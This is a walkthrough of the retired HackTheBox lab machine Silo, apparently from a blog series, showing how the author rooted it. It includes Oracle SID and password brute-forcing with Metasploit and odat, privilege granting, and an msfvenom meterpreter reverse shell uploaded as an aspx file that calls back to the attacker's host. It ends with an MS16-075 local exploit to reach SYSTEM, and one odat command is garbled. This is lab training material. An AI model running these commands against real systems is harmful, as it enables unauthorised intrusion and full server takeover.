Silo HackTheBox WalkThrough
This is Silo HackTheBox machine walkthrough and is also the 17th
machine of our OSCP like HTB Boxes
series. In this writeup I have demonstrated step-by-step how I rooted to Silo HackTheBox
machine. But, before diving into the hacking part let us know something about this box. It is a Windows OS machine with IP address 10.10.10.82
and difficulty Medium
assigned by its maker.
Since this machine is currently retired
on HackTheBox
platform so you will require VIP
subscription at HackTheBox.eu to access this machine. So first of all connect your Kali/Parrot machine with HackTheBox VPN
and confirm your connectivity with this machine by pinging its IP address 10.10.10.82. If all goes correct then start hacking.
As usual I started by scanning the machine. Scanning gives us some idea how we have to proceed further like it helps to find open and closed ports and gives us information of different services running over them. I have used Nmap
for this task and the result is given below:-
Scanning
$ nmap -sC -sV -oN Silo.nmap 10.10.10.82
Nmap revealed a lot of ports as open which also includes port 80
, 135
, 445
and 1521
. All other ports are useless for now because they have less attack surface to try for. Even there are very less number of tools available (as far as I know) that perform enumeration over these ports. So I chose port 80, 135, 445 and 1521 to enumerate first. I started by enumerating on port 80. Microsoft IIS 8.5 webserver
is running on it. So there must be some website hosted on it which can be accessed at the URL http://10.10.10.82.
Ongoing to this URL found IIS default webserver page. Then checked page-source
by pressing CTRL+U
for some type of hints in comment section but found nothing interesting. Searched IIS 8.5
over internet for some exploits but no useful exploit found. Then started directory bruteforcing
at this URL and made it to run in background and move forward for enumeration on other ports because we should have some recon going in background. This will save our time.
SMB
is running on port 139
and 445
. Its version is 2.02
according to nmap script smb2-security-mode
. Since its version is 2 so it should not be vulnerable to eternalblue exploit. Then I tried to perform anonymous login into SMB using $smbmap
and $smbclient
but it gave Access_denied permission because it does not allow anonymous login. So port 139 and 445 are useless until we get any login credentials to access the open shares.
Enumerating on Port 1521
Now we have port 1521
left to enumerate on. Oracle TNS listener 11.2.0.2.0
is running on this port. Searched this version for exploits over internet and found that Oracle TNS Listener running version 11.2.0.2 is vulnerable to Poison Attack
. Check this official link from Oracle. This vulnerability allows a malicious attacker to take complete control of the database server without authentication. I tried to exploit this vulnerability but could not succeed.
After some googling on Oracle TNS listener further, found an interesting tool over GitHub that is used to perform Penetration Testing over Oracle database. The tool is $odat
(Oracle Database Attacking Tool). It is present in kali repo so you can install it using the command $sudo apt install odat
. Also install the requirements as mentioned at it’s official GitHub Repository to make it work. Otherwise $odat
command will return no value and you will keep on hammering your keyboard and left with nothing. So install all the requirement of this tool before its usage.
This tool is a complete package in its all. It helps in SIDguessing
, passwordguessing
, uploding
& downloading
files, executing command
on remote machine and many-many more things. It has multiple features that can be used to test on Oracle Database. We can use this single tool to get USER Shell
on our machine. But I am going to use metasploit for some tasks like, bruteforcing. Because bruteforcing is faster in metasploit than this tool. So basically we are going to do the following things to get shell on our Kali machine.
Steps to Get Reverse Shell
1. Bruteforce on Oracle TNS listener to get SID
using Metasploit
.
2. Bruteforce on Oracle TNS listener to guess USERNAME
& PASSWORD
of the database using Metasploit
.
3. Check the privilege of the USER founded in above step using $sqlplus
(Oracle database access Utility) tool.
4. Change the Privilege of the USER to SYSDBA
5. Check the complete task
which this enumerated USER can perform on this database.
6. Try to UPLOAD
a txt
file on IIS webserver
and access it using the URL http://10.10.10.82/test.txt.
7. Then create an aspx
payload using $msfvenom
and UPLOAD
it to remote webserver.
8. At last open a LISTENER
in $msfconsole
and access the URL http://10.10.10.82/shell1.aspx to get shell.
So first of all start metasploit and use the module auxiliary/admin/oracle/sid_brute
to bruteforce SID.
Bruteforcing for SID
$ odat sidguesser -s 10.10.10.82
Or using Metasploit
msf6 > use auxiliary/admin/oracle/sid_brute
msf6 auxiliary(admin/oracle/sid_brute) > set RHOSTS 10.10.10.82
msf6 auxiliary(admin/oracle/sid_brute) > set RPORT 1521
msf6 auxiliary(admin/oracle/sid_brute) > exploit
SID_Bruteforcing found four SIDs namely XE
, PLSExtProc
, CLRExtProc
& ‘’ [blank]. Let us bruteforce for the database USERNAME & PASSWORD using SID XE
. I have used metasploit for this task also. You can also use $odat
tool for this task.
Bruteforcing for Database User
msf6 > use admin/oracle/oracle_login
msf6 auxiliary(admin/oracle/oracle_login) > set RHOST 10.10.10.82
msf6 auxiliary(admin/oracle/oracle_login) > set SID XE
msf6 auxiliary(admin/oracle/oracle_login) > set RPORT 1521
msf6 auxiliary(admin/oracle/oracle_login) > exploit
Login Bruteforce
is successful and the credential found is scott
: tiger
[This is also the default credential of Oracle Database]. If we would have guessed this credential before we wouldn’t have to bruteforce on this. Anyway, let us move to next step. Login into this database using $sqlplus
and check the privilege
given to user scott
Checking Privilege of Scott
$ sqlplus scott/[email protected]:1521/XE
SQL > SELECT * FROM user_role_privs;
Currently user scott has Granted_Role Connect
and Resource
. Let us give it SYSDBA
(you can think this permission like sudo) privilege so that it can upload/download and execute command on this database. Of course we can’t give it the SYSDBA (System Database Administrator) privilege but our hacking tool $odat
will do this task.
Giving Admin Privilege to Scott
$ sudo odat privesc -s 10.10.10.d -XE U -scott 82 -P tiger --sysdba --dba-with-execute-any-procedure
You can clearly see that DBA role is granted to this USER. Let us again check and confirm its privilege by logging into the database.
Again Checking Privilege of Scott
$ sqlplus scott/[email protected]:1521/XE
SQL> SELECT * FROM user_role_privs;
Now we have granted DBA
role to user scott. Let us check the task
that can be performed by this user on Silo machine.
Testing What Scott can do on this DB
$ sudo odat all -s 10.10.10.82 -d XE -U SCOTT -P tiger --sysdba
We can see a list of operations permitted to this user in the above screenshot. It also contains DBMS_XSLPROCESSOR
library operation. This Library can be used to upload
and download
file to Silo machine using Oracle database. What if we upload a file into the IIS webserver directory and access the file using web interface. If this will be possible we can upload our reverse shell
in web server
and execute the shell using web interface to get Reverse shell on our listener. Let us test this upload feature by uploading a txt file to the IIS web directory.
Trying to Upload Text File
$ echo "Hi this is test File" > test.txt
$ odat dbmsxslprocessor --sysdba -s 10.10.10.82 -U scott -P tiger -d XE --putFile "C:\\inetpub\\wwwroot\\" "test.txt" "/home/deepak/HTB/Boxes/Silo/test.txt"
File is successfully uploaded to IIS webserver. Let us check whether we are able to access it or not using the URL http://10.10.10.82/test.txt
We can see the content of the file. Now our next step should be to create an msfvenom reverse shell payload with extension aspx
(because IIS web server mostly host aspx extension file) and upload it to the webserver using the $odat
tool.
Creating & Uploading Reverse Shell
$ msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.14.8 LPORT=5432 -f aspx -o shell1.aspx
$ odat dbmsxslprocessor --sysdba -s 10.10.10.82 -U scott -P tiger -d XE --putFile "C:\\inetpub\\wwwroot\\" "shell1.aspx" "/home/deepak/HTB/Boxes/Silo/shell1.aspx"
We have successfully uploaded the shell1.aspx
file to the webserver. Now our next step is to start listener in $msfconsole
and accept the reverse connection on it by accessing the URL http://10.10.10.82/shell1.aspx. We can’t use netcat
listener here because in our revere shell
we have used staged payload. So start listener in one window and access the URL http://10.10.10.82/shell1.aspx using $curl
in other windows to get shell.
Getting User Shell
msf6 > use exploit/multi/handler
msf6 exploit(multi/handler) > set PAYLOAD windows/x64/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set LHOST 10.10.14.8
msf6 exploit(multi/handler) > set LPORT 5432
msf6 exploit(multi/handler) > exploit
meterpreter > getuid
meterpreter > sysinfo
We have got meterpreter
shell as user IIS APPPOOL\DefaultAppPool
. Let us capture user flag.
Capture User Flag
meterpreter > search -f user.txt "C:\\Users\\"
meterpreter > cat "c:\Users\Phineas\Desktop\user.txt"
Privilege Escalation
To escalate the privilege to administrator we have to first find a privilege escalation vector using which we can escalate the privilege to admin user. Since we are inside the meterpreter shell so I used multi/recon/local_exploit_suggester
post exploitation module of metasploit to search for possible available kernel exploits. This module searches kernel exploit
whose patch is not installed in victim machine.
Finding PrivEsc Vector
meterpreter > run multi/recon/local_exploit_suggester
Local Exploit Suggeter listed 5 exploits that can be used to get admin shell. So here our PrivEsc vector can be a Kernel Exploit. Tried each of them one by one and 4 exploits failed and only exploit/windows/local/ms16_075_reflection_juicy
worked for me. So here our PrivEsc vector is Kernel Exploit
. Let us get admin shell using this module.
Getting Admin Shell
meterpreter > background
msf6 exploit(multi/handler) > use exploit/windows/local/ms16_075_reflection_juicy
msf6 exploit(windows/local/ms16_075_reflection_juicy) > set SESSION 1
msf6 exploit(windows/local/ms16_075_reflection_juicy) > set LHOST 10.10.14.8
msf6 exploit(windows/local/ms16_075_reflection_juicy) > exploit
meterpreter > getuid
We are NT AUTHORITY\SYSTEM
now. Let us capture root flag from admin folder.
Capture Root Flag
meterpreter > search -f root.txt "C:\\Users\\"
meterpreter > cat "c:\Users\Administrator\Desktop\root.txt"
This was how I rooted to Silo HackTheBox machine. Hope you have got something to learn from this machine walkthrough and my methodology. Thanks for reading this article. For any query and suggestion related to walkthrough feel free to contact us at [email protected].